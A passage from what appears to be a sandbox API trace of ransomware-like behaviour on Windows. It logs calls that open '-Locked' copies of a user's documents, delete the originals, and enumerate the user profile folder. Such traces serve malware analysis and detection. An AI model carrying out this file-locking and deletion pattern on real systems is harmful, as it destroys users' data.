hFindFile=0x737a28) returned 1 [0299.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0299.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0299.289] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked", lpFilePart=0x0) returned 0x49 [0299.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0299.289] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\bvt ejkmcvm0r4exk.ods-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.289] GetFileType (hFile=0x498) returned 0x1 [0299.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0299.290] GetFileType (hFile=0x498) returned 0x1 [0299.293] CloseHandle (hObject=0x498) returned 1 [0299.293] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods", lpFilePart=0x0) returned 0x42 [0299.293] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\BVt ejKmCvm0R4EXK.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\bvt ejkmcvm0r4exk.ods")) returned 1 [0299.296] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked", lpFilePart=0x0) returned 0x43 [0299.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0299.297] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\mikc8rxt4q.pptx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.297] GetFileType (hFile=0x498) returned 0x1 [0299.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0299.297] GetFileType (hFile=0x498) returned 0x1 [0299.300] CloseHandle (hObject=0x498) returned 1 [0299.301] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx", lpFilePart=0x0) returned 0x3c [0299.301] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\mIKc8RXt4Q.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\mikc8rxt4q.pptx")) returned 1 [0299.303] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked", lpFilePart=0x0) returned 0x3e [0299.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0299.303] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\ppl3t.xlsx-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.303] GetFileType (hFile=0x498) returned 0x1 [0299.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0299.303] GetFileType (hFile=0x498) returned 0x1 [0299.305] CloseHandle (hObject=0x498) returned 1 [0299.306] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx", lpFilePart=0x0) returned 0x37 [0299.306] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\ppl3T.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\ppl3t.xlsx")) returned 1 [0299.307] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked", lpFilePart=0x0) returned 0x48 [0299.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0299.308] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\rrshmo_ed0_wrhah.pdf-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.308] GetFileType (hFile=0x498) returned 0x1 [0299.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0299.308] GetFileType (hFile=0x498) returned 0x1 [0299.311] CloseHandle (hObject=0x498) returned 1 [0299.311] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf", lpFilePart=0x0) returned 0x41 [0299.311] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y\\rRshMO_Ed0_wrhaH.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y\\rrshmo_ed0_wrhah.pdf")) returned 1 [0299.314] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y", lpFilePart=0x0) returned 0x2c [0299.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0299.314] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x32cd0529, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32cd0529, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0299.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0299.315] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y")) returned 0 [0299.323] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0299.323] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0299.328] CoTaskMemFree (pv=0x73f0b8) [0299.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0299.344] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX", lpFilePart=0x0) returned 0x15 [0299.344] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\", lpFilePart=0x0) returned 0x16 [0299.344] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.345] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.345] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0299.345] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0299.346] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0299.346] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0299.346] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0299.346] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4e6a95a, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4e6a95a, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0299.347] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0299.347] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0299.347] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0299.348] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0299.348] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb45c2764, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb45c2764, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0299.348] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0299.348] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0299.349] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf3d0952f, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0xf3d0952f, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x180000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0299.349] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x59400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0299.349] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x84000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0299.349] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0299.349] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0299.349] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0299.350] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0299.350] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0299.350] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4766337, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4766337, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0299.350] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0299.351] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0299.351] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0299.351] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0299.351] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0299.352] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0299.353] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, 